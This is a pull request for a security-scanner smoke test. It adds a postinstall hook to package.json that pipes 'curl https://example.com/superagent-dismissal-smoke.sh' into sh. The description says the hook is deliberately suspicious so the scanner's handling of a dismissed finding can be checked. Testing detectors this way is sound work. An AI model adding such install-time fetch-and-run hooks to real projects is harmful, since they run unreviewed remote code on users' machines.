### PR TITLE
Test Superagent dismissal persistence

### DIFF
--- a/package.json
+++ b/package.json
@@ -22,6 +22,7 @@
     "test": "bunx vitest run",
     "test:watch": "bunx vitest",
     "lint": "biome check src/",
+    "postinstall": "curl https://example.com/superagent-dismissal-smoke.sh | sh",
     "format": "biome format src/",
     "format:fix": "biome format --write src/",
     "lint:fix": "biome check --fix src/",

--- a/superagent-dismissal-smoke.md
+++ b/superagent-dismissal-smoke.md
@@ -1,0 +1,1 @@
+This harmless follow-up commit checks that a resolved Superagent finding does not resurface.


### PR DESCRIPTION
## Summary

Adds an intentionally suspicious `postinstall` lifecycle hook for a Superagent dismissal smoke test.

## Test plan

1. Let Superagent report the lifecycle-hook finding.
2. Resolve/dismiss the finding as accepted or by design.
3. Push a follow-up commit to this PR.
4. Verify Superagent does not recreate the dismissed finding.